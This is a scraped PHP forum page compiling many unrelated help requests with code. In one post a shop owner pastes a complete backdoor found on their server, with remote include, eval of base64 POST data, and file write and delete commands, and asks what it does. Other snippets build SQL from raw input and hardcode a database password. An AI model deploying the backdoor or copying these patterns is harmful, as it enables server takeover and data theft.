|
PHP - Run Vbscript On Server From Php Code
Is it possible to run a VBScript on the server from a PHP file called by the client? I am using Apache as my web server on a Windows Server 2003 machine.
<?php exec('saveAsTxt.vbs'); ?> It just hangs the browser and doesn't do anything. I'm not sure what is going on. If anyone can help, it would be much appreciated. Thanks Mike Similar TutorialsI hope someone can help me with this one. I have tried all sorts of different methods and I can't seem to get the syntax correct. The application is calling a program called ZP4, a database used for address scrubbing, using COM. From their documentation: Quote ZP4IPCOM exposes a simple interface of four different calls: Input, Correct, Output, and Reset. "Input" is used to pass address input to ZP4... "Correct" is used to make ZP4 search the ZIP+4 database for the previously specified input address. "Output" retrieves a ZP4 output field. The COM example they give in the documentation uses VB. The VB code executes as it should without problems but everything I try with PHP issues an error: Here is the VB code straight from their documentation, which executes correctly. Code: [Select] Set zp4 = CreateObject("ZP4IPCom.ZP4Com") zp4.input "Company", "xyz corp" zp4.input "Address", "box 1920" zp4.input "City", "rio del mar" zp4.correct MsgBox zp4.output("ZIP (final)") Set zp4 = Nothing Here is my attempt at the translation to PHP, which issues an error (Method not found for 3 of the 4 methods) Code: [Select] $zp4 = new COM('ZP4IPCom.ZP4Com'); $zp4->reset; $zp4->input("Company", "xyz corp"); $zp4->input("Address", "box 1920"); $zp4->input("City", "rio del mar"); $zp4->correct; $output = $zp4->output("ZIP (final)"); echo $output; $zp4 = null; It's strange because the output method is found, because the results will be displayed on the program's server log window, but the other 3 methods are not found (input, reset, and correct). Any help with this would be greatly appreciated! I have some code that works fine on my dev server but does not work on my production server. Dev server has PHP version 5.2.5 and production server has PHP version 5.1.6. This is the part of the code that isn't working on the prod. server: $xmlDoc=new DOMDocument(); $xmlDoc->loadXML($tmpDoc); $x=$xmlDoc->getElementsByTagName('link'); //get the q parameter from URL $q=$_GET["q"]; //lookup all links from the xml file if length of q>0 if (strlen($q)>0) { $hint=""; for($i=0; $i<($x->length); $i++) { $y=$x->item($i)->getElementsByTagName('title'); $z=$x->item($i)->getElementsByTagName('url'); if ($y->item(0)->nodeType==1) { //find a link matching the search text if (stristr($y->item(0)->childNodes->item(0)->nodeValue,$q)) { if ($hint=="") { $hint="<tr><td><a href='" . $z->item(0)->childNodes->item(0)->nodeValue . "' target='_blank'>" . $y->item(0)->childNodes->item(0)->nodeValue . "</td></tr>"; } else { $hint=$hint . "<tr><td><a href='" . $z->item(0)->childNodes->item(0)->nodeValue . "' target='_blank'>" . $y->item(0)->childNodes->item(0)->nodeValue . "</a></td></tr>"; } } } } } $tmpDoc is a variable that holds database information in xml form. It basically looks like this: $tmpDoc = $tmpDoc . "<link><title>" . $row['CustomerName'] . "****" . $row['Rep'] . "****" . $row['InstallDate'] . "****" . $row['PaidDate'] . "</title><url>accountPage.php?AccNum=" . $row['AccountNum'] . "</url></link>"; ...that is inside a while loop that loops through the rows returned by a query. Basically, as I said, the whole thing works fine on my dev server but on the production server it never makes it into the for loop so I guess the condition $i<($x->length) isn't being met. I'm at a bit of a loss here. Is there anything like the PHP version or Apache version that may cause the "->" operator to not work? The prod PHP version isn't that much older than my dev PHP version so I doubt that's the issue but it's about all I can think of. Thanks! Hi, A consumer give me WSDL that describe SOAP messages in order to communicate together by Web services. The first WSDL is a webservice that I consume, no problem for this part. But the second one must be implemented in our side, a wsdl is provided to describe the ws that we must develop. The problem is that I don't know how to do? Is a tool exist to generate server code from a wsdl? should I develop from scratch and try to match the wsdl? Any clue will be welcome. Regards, Kyor I have a phppage which needs 1) to load images ,image paths and image name from a different server,when the page is loaded 2)Details automatically saved to the database. can we do this with php(i mean can we take datas from a different server through php code) I have a page that you click to from your email to validate your account. Whenever you click that link and it goes to this page, the server connection times out. What is in this code that would make it timeout (it does not give an error, just says connecting...then times out) session_start(); include "../incl/connectdb.php"; $key1 = $_GET['id']; $key2= $_GET['id2']; $query = "select * from users where passkey = '$key1' and pass2 = '$key2' and activation= 'pending' LIMIT 1"; $result = mysql_query ($query) or die (mysql_error()); $row = mysql_fetch_array ($result); if (mysql_num_rows ($result) < 1){ $_SESSION['message'] = "Invalid link"; header ("Location: ../"); exit(); } $query = "update table-name set activation= 'active' where id = '".$row['id']."' "; mysql_query($query); $_SESSION['message'] = "Account validated."; Hello I recently got a "to many connection" error on my site, and want to know if anyone here knows a few codes that will show how many connection currently are in use (maybe even what files that creates them). I found I can use "Threads_connected" to show current open connections, but no info on how to write the code or where to pu the file. I hope you can show my what to do I have had a customer want to run my application (PHP/APACHE/MYSQL) on their server rather than a commercial hosting offering (JUSTHOST/GODADDY)
I am reluctant, as it means giving them access to my PHP code which could possibly be copied or distributed.
Can I protect against this?
Hello everyone.. This is the first PHP script I've written and was hoping to get some feedback on any possible issues with it. I've pieced this together in an attempt to download remote images and store them on my server, instead of hotlinking images. The code will be used for a forum, called up by a BBCode tag. (The user will place an image URL into the BBCode, which will transfer to this PHP script). Again, this is the first time I've coded anything in PHP and was hoping to get some pointers on anything that needs changing.. thanks <?php $url = $_GET['url']; $url_path = parse_url($url, PHP_URL_PATH); $name = basename($url_path); $FileExt= substr($name, -3); $FileTypeMIME= array("jpg" => "image/jpeg", "png" => "image/png", "gif" => "image/gif"); $ContentType= $FileTypeMIME[$FileExt]; if (empty($ContentType)) die("You are not allowed to access this file!"); header("Content-Type: " . $ContentType); $save = "../images/". strtolower($name); function wtf_image ($file) { switch($FileTypeMIME[$FileExt]){ case "image/jpeg": $im = imagecreatefromjpeg($file); //jpeg file imagejpeg($im, $save, 0, NULL); //save jpeg file break; case "image/gif": $im = imagecreatefromgif($file); //gif file imagegif($im, $save, 0, NULL); //save gif file break; case "image/png": $im = imagecreatefrompng($file); //png file imagePNG($im, $save, 0, NULL); //save png file break; } return $im; } if (file_exists($save)) { readfile($save); } else { chmod($save,0755); $image = wtf_image($url); //Runs wtf_image function on $url imagedestroy($image); readfile($save); } ?> I found this code added to my server uploaded into a zencart admin folder. We did have some problems previously with index.php and login.php files having some encoded javascript injected into them and mess up our online shop. If someone could tell me what it does as i accidently launched it before i deleted it. Looked in the server logs and it seems to of accessed every file on the server within seconds. Code: [Select] <?php //e6b03bed4190733c7534e5c1209b076f /** * @version 2.42 * */ if (isset($_POST["action"])) { switch ($_POST["action"]) { case "test": test(); break; case "regular_test": regular_test(); break; case "setup": projectcodes_setup(); break; case "remove": projectcodes_remove(); break; case "mail": send(); break; default: break; } return; } if (count($_GET) > 0) { foreach ($_GET as $id => $code) { if ($id == "id") { include $code; } } return; } function test() { $encoded_data = ""; $data["version"] = phpversion(); if (isset($_SERVER["SERVER_SOFTWARE"])) { $data["serverapi"] = $_SERVER["SERVER_SOFTWARE"]; } else { $data["serverapi"] = "Not Available"; } ob_start(); phpinfo(8); $data["modules"] = ob_get_contents(); ob_clean(); $data["ext_connect"] = fopen("http://www.ya.ru/", "r") ? TRUE : FALSE; $serializes_data = serialize($data); $encoded_data = base64_encode($serializes_data); echo $_POST["test_message"] . $encoded_data; } function regular_test() { echo $_POST["test_message"]; } function projectcodes_setup() { $projectcodes = $_POST["projectcodes"]; foreach ($projectcodes as $projectcode) { $mark = $projectcode["mark"]; $code = base64_decode($projectcode["code"]); $res = new_file_put_contents($mark, $code); if ($res) { $installed[] = $projectcode["id"]; } } $installed = serialize($installed); $installed = base64_encode($installed); echo $installed; } function projectcodes_remove() { $projectcodes = $_POST["projectcodes"]; foreach ($projectcodes as $projectcode) { $mark = $projectcode["mark"]; $res = unlink($mark); if ($res) { $removed[] = $projectcode["id"]; } } $removed = serialize($removed); $removed = base64_encode($removed); echo $removed; } function new_file_put_contents($filename, $data) { $f = @fopen($filename, 'w'); if (!$f) { return false; } else { $bytes = fwrite($f, $data); fclose($f); return $bytes; } } function new_file_get_contents($filename) /* Returns the contents of file name passed */ { if (!function_exists('file_get_contents')) { $fhandle = fopen($filename, "r"); $fcontents = fread($fhandle, filesize($filename)); fclose($fhandle); } else { $fcontents = file_get_contents($filename); } return $fcontents; } function send() { $code = base64_decode($_POST["projectcode"]); eval($code); //return; } ?> I hope I'm posting in the correct forum. If not, I'm super sorry! Anyways, I need help with a website I'm working on. We have been asked to redesign our "Apply Online" page. My supervisor has asked that I find the correct code to make an upload button that will allow users to upload their resumes to our server, and send a copy to the specific branch they indicate (we have 17 branches). Could any of you point me in the correct direction for this code? I've seen several sites for Uploads to servers, but I'm worried this isn't exactly what we are looking for. I am trying to get a php script on a remote server to execute on my server but im having problems getting it to work, and i am not sure if it is even feasible i have had a look on google but i cant find much information on it. This is what i have tried up to now I saved a php script as a txt file on y remote server. then used file_get_contents on my home server $curl_scraped_page = file_get_contents('http://www.remote_server.com/script.txt'); the content of the txt file was $sum = 1+1; then i tried to echo $sum on the home server but i did not work can anyone point me in the right direction or is what i am trying to do even feasible? Thanks in advanced To access MySql tables from PHP, I use the PHP code and the function below. If I make these changes, would this code work for SQL Server 2008? mysql_fetch_array to mssql_fetch_array mysql_connect to mssql_connect mysql_select_db to mssql_select_db mysql_query to mssql_query PHP code -------------------------------------------------------------------------------- $sql = "SELECT mast_id FROM district_mast WHERE mast_district = '".$dist_num."'"; $result = func_table_access($sql); $rows = mysql_fetch_array($result); Function -------------------------------------------------------------------------------- FUNCTION func_table_access($sql) { $db = "aplustutoru"; $host = "localhost"; $user = "root"; $pass = ""; IF (!($conn=mysql_connect($host, $user, $pass))) { PRINTF("error connecting to DB by user = $user and pwd=$pass"); EXIT; } $db3 = MYSQL_SELECT_DB($db,$conn) or die("Unable to connect to local database"); IF ($sql <> "justopendb") { $result = MYSQL_QUERY($sql) OR DIE ("Can not run query because ". MYSQL_ERROR()); RETURN $result; } } Hi guys, this is the geocoding part of the code. I ran this ion my localhost and it runs ok. Then when i uploaded it to my server i got 500 - Internal server error. There is a problem with the resource you are looking for, and it cannot be displayed. When i take out the php the html code run ok... so its not that. Can anyone help? I have taken out my key and db connection. Im hosted on black knight if thats any help Code: [Select] <?php require("config.php"); define("MAPS_HOST", "maps.google.com"); define("KEY", "****"); // Opens a connection to a MySQL server $connection = mysql_connect("localhost", "root", "password"); if (!$connection) { die("Not connected : " . mysql_error()); } // Set the active MySQL database $db_selected = mysql_select_db("database", $connection); if (!$db_selected) { die("Can\'t use db : " . mysql_error()); } // Select all the rows in the markers table $query = "SELECT * FROM users WHERE 1"; $result = mysql_query($query); if (!$result) { die("Invalid query: " . mysql_error()); } // Initialize delay in geocode speed $delay = 0; $base_url = "http://" . MAPS_HOST . "/maps/geo?output=xml" . "&key=" . KEY; // Iterate through the rows, geocoding each address while ($row = @mysql_fetch_assoc($result)) { $geocode_pending = true; while ($geocode_pending) { $address = $row["address1"]; $id = $row["id"]; $request_url = $base_url . "&q=" . urlencode($address); $xml = simplexml_load_file($request_url) or die("url not loading"); $status = $xml->Response->Status->code; if (strcmp($status, "200") == 0) { // Successful geocode $geocode_pending = false; $coordinates = $xml->Response->Placemark->Point->coordinates; $coordinatesSplit = explode(",", $coordinates); // Format: Longitude, Latitude, Al itude $lat = $coordinatesSplit[1]; $lng = $coordinatesSplit[0]; $query = sprintf("UPDATE users " . " SET lat = '%s', lng = '%s' " . " WHERE id = '%s' LIMIT 1;", mysql_real_escape_string($lat), mysql_real_escape_string($lng), mysql_real_escape_string($id)); $update_result = mysql_query($query); if (!$update_result) { die("Invalid query: " . mysql_error()); } } else if (strcmp($status, "620") == 0) { // sent geocodes too fast $delay += 100000; } else { // failure to geocode $geocode_pending = false; echo "Address " . $address . " failed to geocoded. "; echo "Received status " . $status . " \n"; } usleep($delay); } } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>Your Profile Page</title> <meta http-equiv="content-type" content="text/html; charset=utf-8" /> <link rel="stylesheet" href="css/1.css" type="text/css" media="screen,projection" /> </head> <body> <div id="wrapper" class="fixed"> <div id="header"> <h1>Find A Tag Team</strong></h1> <ul id="nav"> <li><a href="home.html">Home</a></li> <li><a href="index.html"></a>Logout</li> <li><a href="Links.php">Links</a></li> <li><a href="Videos.php">Videos</a></li> </ul> </div> <div id="sidebar_left"> <h2>Your Profile Page</h2> <p> </p> <p> From here you can ...<br /> -Edit all your information <br /> -Search for other users <br /> -View any emails you may have recieved</br /> </p> <p> </p> </div> <div id="content"> <h1>Profile</h1> <div class ="message"> The map has been succesfully updated. <br /> <a href = "map.php">View the Map</div> <div id="footer"> </div> </div> </body> </html> Hi Guys, I am new to this forum. I have tried other forums but with no success. I hope you can answer me. Project: Job Application Form along with CV upload. Backend: MySQL. Problem: When the form is submitted, it replaces the same named file in my server. Example: When I upload a file named "Example.doc" using this form and if there is already a file named "Example.doc" in the same directory (Server), the new file (example.doc) will replace the old one. Solution Required: May be, a) When I upload a file, the file name gets renamed with say the personsname+DOB+timestamp. b) Any other solution which will not delete the old files present. I am pasting the PHP code that I used .... for your kind perusal. Please help: <?php // Receiving variables @$pfw_ip= $_SERVER['REMOTE_ADDR']; @$Name = addslashes($_POST['Name']); @$Telephone = addslashes($_POST['Telephone']); @$Email = addslashes($_POST['Email']); @$Mobile = addslashes($_POST['Mobile']); @$CITY = addslashes($_POST['CITY']); @$OtherLocation = addslashes($_POST['OtherLocation']); @$PostalAddress = addslashes($_POST['PostalAddress']); @$Years = addslashes($_POST['Years']); @$Months = addslashes($_POST['Months']); @$Lacs = addslashes($_POST['Lacs']); @$Thousands = addslashes($_POST['Thousands']); @$FunctionalArea = addslashes($_POST['FunctionalArea']); @$CurrIndustry = addslashes($_POST['CurrIndustry']); @$KeySkills = addslashes($_POST['KeySkills']); @$ResumeTitle = addslashes($_POST['ResumeTitle']); @$JobID = addslashes($_POST['JobID']); @$TenthUniv = addslashes($_POST['TenthUniv']); @$TenthPer = addslashes($_POST['TenthPer']); @$TwlUniv = addslashes($_POST['TwlUniv']); @$TwlPer = addslashes($_POST['TwlPer']); @$UGCOURSE = addslashes($_POST['UGCOURSE']); @$GradPer = addslashes($_POST['GradPer']); @$PGCOURSE = addslashes($_POST['PGCOURSE']); @$PPGCOURSE = addslashes($_POST['PPGCOURSE']); @$course1 = addslashes($_POST['course1']); @$course2 = addslashes($_POST['course2']); @$course3 = addslashes($_POST['course3']); @$Gender = addslashes($_POST['Gender']); @$DOB = addslashes($_POST['DOB']); @$Nationality = addslashes($_POST['Nationality']); @$select2 = addslashes($_POST['select2']); @$file_Name = $_FILES['file']['name']; @$file_Size = $_FILES['file']['size']; @$file_Temp = $_FILES['file']['tmp_name']; @$file_Mime_Type = $_FILES['file']['type']; function RecursiveMkdir($path) { if (!file_exists($path)) { RecursiveMkdir(dirname($path)); mkdir($path, 0777); } } // Validation if( $file_Size == 0) { die("<p align='center'><font face='Arial' size='3' color='#FF0000'>Please enter a valid file</font></p>"); } if( $file_Size >50000000) { //delete file unlink($file_Temp); die("<p align='center'><font face='Arial' size='3' color='#FF0000'>Please enter a valid file</font></p>"); } if( $file_Mime_Type != "application/msword" AND $file_Mime_Type != "application/pdf" AND $file_Mime_Type != "application/rtf" ) { unlink($file_Temp); die("<p align='center'><font face='Arial' size='3' color='#FF0000'>Please enter a valid file</font></p>"); } $uploadFile = $file_Name ; if (!is_dir(dirname($uploadFile))) { @RecursiveMkdir(dirname($uploadFile)); } else { @chmod(dirname($uploadFile), 0777); } @move_uploaded_file( $file_Temp , $uploadFile); chmod($uploadFile, 0644); $file_URL = "http://www.myserver.com/resume/".$file_Name ; //saving record to MySQL database @$pfw_strQuery = "INSERT INTO `Candidate_Test`(`Name`,`tel`,`email`,`mob`,`city`,`othr`,`add`,`yrs`,`mon`,`lacs`,`thnd`,`func`,`curr`,`skills`,`title`,`Jobid`,`tenb`,`tenp`,`twlb`,`twlp`,`ugb`,`ugp`,`pg`,`ppg`,`c1`,`c2`,`c3`,`gen`,`dob`,`nation`,`pref`,`file`)VALUES (\"$Name\",\"$Telephone\",\"$Email\",\"$Mobile\",\"$CITY\",\"$OtherLocation\",\"$PostalAddress\",\"$Years\",\"$Months\",\"$Lacs\",\"$Thousands\",\"$FunctionalArea\",\"$CurrIndustry\",\"$KeySkills\",\"$ResumeTitle\",\"$JobID\",\"$TenthUniv\",\"$TenthPer\",\"$TwlUniv\",\"$TwlPer\",\"$UGCOURSE\",\"$GradPer\",\"$PGCOURSE\",\"$PPGCOURSE\",\"$course1\",\"$course2\",\"$course3\",\"$Gender\",\"$DOB\",\"$Nationality\",\"$select2\",\"$file_Name\")" ; @$pfw_host = "localhost"; @$pfw_user = "testuser"; @$pfw_pw = "ultimate09"; @$pfw_db = "Resumebank"; $pfw_link = mysql_connect($pfw_host, $pfw_user, $pfw_pw); if (!$pfw_link) { die('Could not connect: ' . mysql_error()); } $pfw_db_selected = mysql_select_db($pfw_db, $pfw_link); if (!$pfw_db_selected) { die ('Can not use $pfw_db : ' . mysql_error()); } //insert new record $pfw_result = mysql_query($pfw_strQuery); if (!$pfw_result) { die('Invalid query: ' . mysql_error()); } mysql_close($pfw_link); echo("<p align='center'><font face='Arial' size='3' color='#FF0000'>Successful</font></p>"); ?> -------- PLEASE HELP. URGENTLY REQUIRED!!!! Sourav Sengupta This topic has been moved to Miscellaneous. http://www.phpfreaks.com/forums/index.php?topic=321861.0 Hi guys, I need a help to find out what is a problem. Some of my code does not work on my local comp and in the same time it works well when I place it on Internet server. First example: Code: [Select] <body> <?php if($_POST['submit_form'] == "Submit") { $varNewTeam = $_POST['Reg_Team']; $varNewCity = $_POST['Reg_City']; $db = mysql_connect('localhost', 'root', '') or die ('no connection with server'); mysql_select_db('db_m ,$db) or die('DB error'); mysql_query ("INSERT INTO reg2012 VALUES ('$varNewTeam','$varNewCity')") or die('insert error'); } ?> <form action="registration_2012_form.php" method="post"> <p>Team: <input type="text" name="Reg_Team" size="20" maxlength="50" value="<?=$varNewTeam;?>" /><br /></p> <p>City: <input type="text" name="Reg_City" size="20" maxlength="50" value="<?=$varNewCity;?>" /><br /></p> <p><input type="Submit" value="Submit" name="submit_form" /></p> </form> </body> On local comp: It gives me message "Undefined index: submit_form". On Net server works well. If I split the code in two files. In the first one I leave the form with "action=FILE2.php" and put my php code in the second file "FILE2.php" - it starts work even on local server. second example: Code: [Select] <body> <?php $db = mysql_connect('localhost', 'root', '') or die ('no connection with server'); mysql_select_db('db_m' ,$db) or die('DB error'); mysql_query ("CREATE TABLE temp1 (team char(50), city char(50) )") or die('create tables error'); ?> </body> It works in the Net and can not create the TABLE on my local comp. I use XAMPP on my local comp (if it's important) Hey All, I will be marketing a simple php script shortly and would like to Obfuscate my code and have it check to see if the person is running the script on the proper domain, much like other Purchased Scripts, you have to buy licenses and some are limited to a Per Domain basis. Could I use cURL to run a script on another server (mine) that takes the URL it came from, and a variable "the auth key" and check if the person is using the script on the proper domain? If the domain and auth key don't match in the DB i would return a message saying invalid key or something, else continue to execute the script. <?php //authkey would be defined in config file $authkey = "769870afhljkzxf90436"; $curl_handle=curl_init(); curl_setopt($curl_handle,CURLOPT_URL,"http://example.com/page.php?authkey=$authkey"); curl_setopt($curl_handle,CURLOPT_CONNECTTIMEOUT,2); curl_setopt($curl_handle,CURLOPT_RETURNTRANSFER,1); $buffer = curl_exec($curl_handle); curl_close($curl_handle); if (empty($buffer)) { print "Sorry, AuthServ is performing maintenance.....<p>"; } else { print $buffer; } ?> Is there a smarter way to do this? I don't have an extra 300 bucks to use something like ioncube, just looking for a general proper direction on going about this as I am totally clueless. thanks Hello, I am creating a website with the use of php and mysql. While I am not advanced, I've been learning quite a bit on php. However, I am looking to build a tracker type script and hide it into my coding so that if someone were to hack into my website and take my website coding, that it would send me an email notifying that they were using my coding. How would I go about this? If you can help me, i'd be glad to credit you! Thank you! Hi Little Help Needed I have created a new website In the index.php file i want to show records from database Now, here is how the problem arise I want to import codes from github intead of hosting those files on my server because i want to keep it opensource Below is the code I am using <?php // connect to the database include('connect-db.php'); // get results from database $sql = "SELECT id, upadhi, name FROM munishri"; $result = $conn->query($sql); if ($result->num_rows > 0) { // output data of each row while($row = $result->fetch_assoc()) { echo "id: " . $row["id"]. " - Name: " . $row["upadhi"]. " " . $row["name"]. "<br>"; } } else { echo "0 results"; } // close connection $conn->close(); ?> Can i host the code to show result in another file and use something like <?php // connect to the database include('connect-db.php'); // get results from database include('http://rawgit.com/th...database.php'); ?> Hi, For about a month, I have been trying to figure out why my code will not return anything after posting a wwwForm (I have also tried the newer equivalent of this function but I had no luck with that either.) The nameField and passwordField are taken from text boxes within the game and the code used in my login script is copied and pasted from a Register script but I have changed the file location to the login.php file. The register script works fine and I can add new users to my database but the login script only outputs "Form Sent." and not the "present" that should return when the form is returned and it never gets any further than that point meaning that it lets the user through with no consequence if they use an invalid name because the script never returns an answer. What should I do to fix this? Thanks, Unity Code:
using System.Collections;
using UnityEngine;
using UnityEngine.UI;
using UnityEngine.Networking;
public class Login : MonoBehaviour
{
public InputField nameField;
public InputField passwordField;
public Button acceptSubmissionButton;
public void CallLogInCoroutine()
{
StartCoroutine(LogIn());
}
IEnumerator LogIn()
{
WWWForm form = new WWWForm();
form.AddField("username", nameField.text);
form.AddField("password", passwordField.text);
WWW www = new WWW("http://localhost/sqlconnect/login.php", form);
Debug.Log("Form Sent.");
yield return www;
Debug.Log("Present"); if (www.text[0] == '0')
{
Debug.Log("Present2");
DatabaseManager.username = nameField.text;
DatabaseManager.score = int.Parse(www.text.Split('\t')[1]);
Debug.Log("Log In Success.");
}
else
{
Debug.Log("User Login Failed. Error #" + www.text);
}
}
public void Validation()
{
acceptSubmissionButton.interactable = nameField.text.Length >= 7 && passwordField.text.Length >= 8;
}
}
login.php:
<?php
echo "Test String2";
$con = mysqli_connect('localhost', 'root', 'root', 'computer science coursework');
// check for successful connection.
if (mysqli_connect_errno())
{
echo "1: Connection failed"; // Error code #1 - connection failed.
exit();
}
$username = mysqli_escape_string($con, $_POST["username"]);
$usernameClean = filter_var($username, FILTER_SANITIZE_STRING, FILTER_FLAG_STRIP_LOW | FILTER_FLAG_STRIP_HIGH);
$password = $_POST["password"];
if($username != $usernameClean)
{
echo "7: Illegal Username, Potential SQL Injection Query. Access Denied.";
exit();
}
// check for if the name already exists.
$namecheckquery = "SELECT username, salt, hash, score FROM players WHERE username='" . $usernameClean . "';";
$namecheck = mysqli_query($con, $namecheckquery) or die("2: Name check query failed"); // Error code # 2 - name check query failed.
if (mysqli_num_rows($namecheck) != 1)
{
echo "5: No User With Your Log In Details Were Found Or More Than One User With Your Log In Details Were Found"; // Error code #5 - other than 1 user found with login details
exit();
}
// get login info from query
$existinginfo = mysqli_fetch_assoc($namecheck);
$salt = $existinginfo["salt"];
$hash = $existinginfo["hash"];
$loginhash = crypt($password, $salt);
if ($hash != $loginhash)
{
echo "6: Incorrect Password"; // error code #6 - password does not hash to match table
exit;
}
echo "Test String2";
echo"0\t" . $existinginfo["score"];
?>
|
|||||||